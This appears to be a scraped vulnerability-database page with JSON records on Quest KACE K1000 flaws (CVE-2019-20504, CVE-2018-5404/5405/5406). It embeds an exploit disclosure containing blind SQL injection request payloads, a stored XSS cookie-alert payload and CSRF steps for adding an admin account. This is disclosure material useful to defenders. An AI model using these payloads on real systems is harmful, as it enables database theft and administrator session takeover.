"data": "service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter. Quest KACE K1000 Systems Management An injection vulnerability exists in the appliance.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Quest Software KACE K1000 Systems Management Appliance (KACE SMA) is a system management device from Quest Software, USA. \n\r\n\r\nThe service / krashrpt.php file in Quest Software KACE SMA 6.4 SP3 (6.4.120822) and earlier versions has a security vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20504",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-16728",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-20504",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"id": "VAR-202003-0967",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
}
],
"trust": 1.225
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
}
]
},
"last_update_date": "2023-12-18T13:47:34.716000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Patch for Quest Software KACE K1000 Systems Management Appliance code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/208349"
},
{
"title": "Quest Software KACE K1000 Systems Management Appliance Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=111677"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/canonical/ubuntu-com-security-api "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-74",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20504"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20504"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://github.com/canonical/ubuntu-com-security-api"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"date": "2020-03-09T00:00:00",
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"date": "2020-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"date": "2020-03-09T01:15:11.233000",
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"date": "2020-03-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"date": "2020-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE K1000 Systems Management Injection vulnerabilities in appliances",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
],
"trust": 0.6
}
}
VAR-201906-1119
Vulnerability from variot - Updated: 2023-12-18 12:28The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated least privileged user with 'User Console Only' rights to potentially inject arbitrary JavaScript code on the tickets page. Script execution could allow a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks. The software also does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other user. An authenticated user with 'user console only' rights may inject arbitrary JavaScript, which could result in an attacker taking over a session of others, including an Administrator. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. Quest Kace K1000 Appliance Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. QuestSoftwareKaceK1000Appliance is a system management device from QuestSoftware, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring. A cross-site scripting vulnerability exists in versions prior to QuestKaceK1000Appliance 9.0.270 that could allow an attacker to execute client-side code. # Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities]
Date: [12/04/2018]
Exploit Author: [SlidingWindow], Twitter: @kapil_khot
Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/]
Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410]
Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ]
CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406]
CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/]
Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update
==================
Product:-
================== Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment.
========================
Vulnerability Details:-
========================
===================================================================================================================================================== 1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404) =====================================================================================================================================================
The Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with ‘User Console Only’ rights. Also, the user input supplied to 'selvalue' parameter is not sanitized that leads to a Blind SQL Injection vulnerability.
Proof-Of-Concept:
- Send following request to the target:
GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1 Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc Connection: close
-
Make a note of Content-Length in the response body.
-
Send following request:
http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
-
Response to above request shows that an error occurred and we are being redirected to /common/error.php
-
Final payload to check if we get the original response back:
http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
- These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
========================================================================================================================================================= 2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404) =========================================================================================================================================================
The Dell Kace allows Admin users to view OVAL templates via 'oval_detail.php', that can be accessed by a user with ‘Read Only Administrator’ rights. Also, the user input supplied to ID parameter is not sanitized that leads to a Blind SQL Injection vulnerability. An authenticated user with ‘Read Only Administrator’ rights could exploit this vulnerability to retrieve sensitive information from the database.
Proof-Of-Concept:
- Send following request to the target:
GET /adminui/oval_detail.php?ID=6200 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.247.100/adminui/oval_list.php Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0 Connection: close Upgrade-Insecure-Requests: 1
-
Response to above request shows some content with the content length of 32109 bytes:
-
It shows information about OVAL-ID#24253:
-
Now send following payload that tests this ID parameter for a true condition:
http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432
-
Response to above request again shows information about the same OVAL-ID#24252:
-
Now, use following payload to test this ID parameter for a false condition:
http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444
-
The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID:
-
These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
========================================================================================================================================================= 3. This script executes every time a user visits this page.
Proof-Of-Concept:
- Log into the Dell Kace K1000 web interface as a least privileged user.
- Navigate to Service Desk-->Tickets and create a new ticket.
-
Inject following payload in the Summary section:
Test Ticketalert("XSSinSummary");alert(document.cookie);<!--
-
Save the ticket.
- Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up.
========================================================================================================================================================= 4. Misconfigured CORS Vulnerability (CVE-2018-5406) =========================================================================================================================================================
The Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, that leads to a Cross Site Request Forgery (CSRF) attack.
An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings. Also, malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings.
Proof-Of-Concept:
- Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine.
- Log into the web interface of the appliance as admin.
- Open a new tab in the same browser and access the HTML page from #1
- Save the ticket.
- Submit the request (This can be modified to submit the request automatically).
- Check BurpSuite to see if the request to add user ‘Hacker’ was sent to the appliance and if it was originated from your Kali machine
- Check the admin console to see if user Hacker has been added:
===================================
Vulnerability Disclosure Timeline:
===================================
04/2018: Submitted report to CERT-US. 04/2018: CERT-US reported the issue to vendor. 05/2018: Awaiting vendor response. 10/2018: Vendor asked to test the patch as they have fixed these issues already. 10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 is fixed in 9.0.270 and still exists in other patched version. 01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019 and asked to publish this on June 01 2019 so that customers have enough time to patch. 05/2019: Vendor published an advisory. 06/2019: CERT-US published a Vulnerability Note, VU#877837
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-1119",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace systems management appliance",
"scope": "lt",
"trust": 1.8,
"vendor": "quest",
"version": "9.0.270"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "quest kace",
"version": null
},
{
"model": "software kace k1000 appliance",
"scope": "lt",
"trust": 0.6,
"vendor": "quest",
"version": "9.0.270"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:quest:kace_systems_management_appliance_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.0.270",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:quest:kace_systems_management_appliance:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5405"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SlidingWindow",
"sources": [
{
"db": "PACKETSTORM",
"id": "153150"
}
],
"trust": 0.1
},
"cve": "CVE-2018-5405",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-5405",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-21111",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-5405",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-5405",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-21111",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-042",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated least privileged user with \u0027User Console Only\u0027 rights to potentially inject arbitrary JavaScript code on the tickets page. Script execution could allow a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks. The software also does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other user. An authenticated user with \u0027user console only\u0027 rights may inject arbitrary JavaScript, which could result in an attacker taking over a session of others, including an Administrator. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. Quest Kace K1000 Appliance Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. QuestSoftwareKaceK1000Appliance is a system management device from QuestSoftware, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring. A cross-site scripting vulnerability exists in versions prior to QuestKaceK1000Appliance 9.0.270 that could allow an attacker to execute client-side code. # Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities]\n# Date: [12/04/2018]\n# Exploit Author: [SlidingWindow], Twitter: @kapil_khot\n# Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/]\n# Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410]\n# Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ]\n# CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406]\n#CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/]\n#Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update\n\n\n==================\n#Product:-\n==================\nQuest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment. \n\n========================\n#Vulnerability Details:-\n========================\n\n=====================================================================================================================================================\n1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404)\n=====================================================================================================================================================\n\nThe Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with \u2018User Console Only\u2019 rights. Also, the user input supplied to \u0027selvalue\u0027 parameter is not sanitized that leads to a Blind SQL Injection vulnerability. \n\n#Proof-Of-Concept:\n------------------\n1. Send following request to the target:\n\nGET /common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=Unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_US\u0026id=13 HTTP/1.1\nHost: 192.168.247.100\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nReferer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1\nCookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; 